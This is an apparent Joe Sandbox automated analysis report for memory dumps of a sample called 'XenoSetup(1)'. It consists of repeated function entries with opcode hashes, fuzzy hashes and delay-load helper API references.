Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: af129d5283faeefdf81a858aa5c7ae47199415bd0fbaf77ff9b23f36ef1b00c4
Instruction ID: 123eb450d8a8ba58266945179a779cd30f5c55d5aa0be7a2d1b25390ffdf6136
Opcode Fuzzy Hash: af129d5283faeefdf81a858aa5c7ae47199415bd0fbaf77ff9b23f36ef1b00c4
Instruction Fuzzy Hash: 7FB012D2398244BD315462075D02D37121CDAC0F20330853EF946C8170E8449C842431

Function 00FFE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4e376caa3b786d33b24c79c7afb4b611a72e0db64cce74ceb74c9236cb736460
Instruction ID: f12b823892769d10e61f94a44e7bb3c1dd81545022be2550f69fe7d38112cbb5
Opcode Fuzzy Hash: 4e376caa3b786d33b24c79c7afb4b611a72e0db64cce74ceb74c9236cb736460
Instruction Fuzzy Hash: B3B012E2298254BD3008E1055D06D37024CD9C4F20330D52EFA45C9074D8449C042833

Function 00FFE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c8cec5e91fe5a2c7d26797952b41f26e4955b6d21e6ba347d155b90a6ed367ec
Instruction ID: 3946b1b82c8f5c109948892b245e0b10216b8850c42a03ba372a0bb261250e44
Opcode Fuzzy Hash: c8cec5e91fe5a2c7d26797952b41f26e4955b6d21e6ba347d155b90a6ed367ec
Instruction Fuzzy Hash: C2B012F2298254BD3008A1055D06D37020CD9C4F20330962EFA45C9074D8489D002433

Function 00FFE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 12b1f3c397813a7563621803741307086e67c0bd8c306bff0e8b09e5bf78069f
Instruction ID: 5153756edcbda3589299af5e3d80f155fa997dc39d1fdd87aabe19a025338d42
Opcode Fuzzy Hash: 12b1f3c397813a7563621803741307086e67c0bd8c306bff0e8b09e5bf78069f
Instruction Fuzzy Hash: DEB012E22982647D3108A1055E06D77020CD9C4F20330D52EF745C9074D8445C092833

Function 00FFE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE580

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 056d933643cd2c79c93901cd72598113a95cc47361806403638014b211a1f1d7
Instruction ID: 7aa922449967c5e1b4ce4c23a9743c9e0bf3de3f142bd9b051daff9dfbd0c898
Opcode Fuzzy Hash: 056d933643cd2c79c93901cd72598113a95cc47361806403638014b211a1f1d7
Instruction Fuzzy Hash: 19B012C22983187D304461559D03D37012CD9C4F20338562EF545CD074E8445C502431

Function 00FFE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE580

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 35baa1123cbf95b00a0b5b229e054a28dca92d1eed620719967b6af07a9e5782
Instruction ID: 9cf01b6eeb6e71d0de5df7b02a54e8309b50e978d2225d7f2c2695dfb3372a7e
Opcode Fuzzy Hash: 35baa1123cbf95b00a0b5b229e054a28dca92d1eed620719967b6af07a9e5782
Instruction Fuzzy Hash: 77B012C22982187D300461559E02D37012CD9C4F20338562EF545CD074EC445C112431

Function 00FFE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE580

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 25561b902e21f53548e36236fee2adb4e84ec6796b625bdc50ecc676e25e4b05
Instruction ID: 24c3426d17a56322aaf9ce52c622b13804e79de3f82c2e7a1696b4bda9b591e4
Opcode Fuzzy Hash: 25561b902e21f53548e36236fee2adb4e84ec6796b625bdc50ecc676e25e4b05
Instruction Fuzzy Hash: FAB012C229821C7E300871555D02D37011CE9C4F20334542EF545CD074E8445C102431

Function 00FFE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f6cf9fbed3af31bd75519162263ac1af8d26adb3719b7da8b9d9189558b9e054
Instruction ID: 6bdbfefa171c0af6d9b4d1e32c1d0daff312e87a2c02ab0ea7ab05fff34b85e4
Opcode Fuzzy Hash: f6cf9fbed3af31bd75519162263ac1af8d26adb3719b7da8b9d9189558b9e054
Instruction Fuzzy Hash: 00B012C26992147D320461099D03D3B010CD9C5F20334572EF545C8079E8486C442431

Function 00FFE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ac32695c09cf1200c0579e940da2dbc8de74cb62fc453a678991fdc0f71ff0ee
Instruction ID: 9b7f1b22741449002e9318c1ddb8334fdba11ef3f4a03db6d02be1d5619d7ab1
Opcode Fuzzy Hash: ac32695c09cf1200c0579e940da2dbc8de74cb62fc453a678991fdc0f71ff0ee
Instruction Fuzzy Hash: D1B012C26991147E310871095D02E3B010CE9C5F20334552EF545C8079E8485C002431

Function 00FFE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6fd122c4b20116737bec7e8992e0cf9ae43ef8ad13bebc8ece90d662fe5a325a
Instruction ID: 210ff32bf43e08e2b334091ce687b705f4b72c9f0aa99f869e8bd22adc5c4249
Opcode Fuzzy Hash: 6fd122c4b20116737bec7e8992e0cf9ae43ef8ad13bebc8ece90d662fe5a325a
Instruction Fuzzy Hash: 94B012C26991547D320871095E02D3B050CD9C5F20334952EF645C8079E8485C012431

Function 00FFE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b83f6b1ff9ccaa108b2b66604e8562362846d16d10198885ca051252383c87d
Instruction ID: c6c10d669835a8c5e7c58033e7f8b4170af03aae519747006fd68f632c57c19b
Opcode Fuzzy Hash: 1b83f6b1ff9ccaa108b2b66604e8562362846d16d10198885ca051252383c87d
Instruction Fuzzy Hash: EEB012C26991147D310421255D06E3B010CEDC1F20334553EF591C847BE8485C042431

Function 00FFE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6ee6cc922fe64c115fc612cc441e80caf2c5735778b425103e83270f45ff8688
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 6ee6cc922fe64c115fc612cc441e80caf2c5735778b425103e83270f45ff8688
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7ff63c464f995dcba027e6f32c3c064db34e9916b3dbd30046cbf6940002f944
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 7ff63c464f995dcba027e6f32c3c064db34e9916b3dbd30046cbf6940002f944
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f84f157993412f7cd2fed1a70f440c6eef4c708df033bf4eb47055ec0d863ade
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: f84f157993412f7cd2fed1a70f440c6eef4c708df033bf4eb47055ec0d863ade
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8a6597262aa8938b14d9724d752cb6822da63fe58b0bc13423161ac83273a3da
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 8a6597262aa8938b14d9724d752cb6822da63fe58b0bc13423161ac83273a3da
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7c781ca0481dc7d52546a18a8148b6466e1fa4c7c7386cad2e678329bb21916
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: a7c781ca0481dc7d52546a18a8148b6466e1fa4c7c7386cad2e678329bb21916
Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430

Function 00FFE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 84299d3a73d59b42108fb3003d7325af3f80db8dea3151a0c877188f722ef42a
Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
Opcode Fuzzy Hash: 84299d3a73d59b42108fb3003d7325af3f80db8dea3151a0c877188f722ef42a
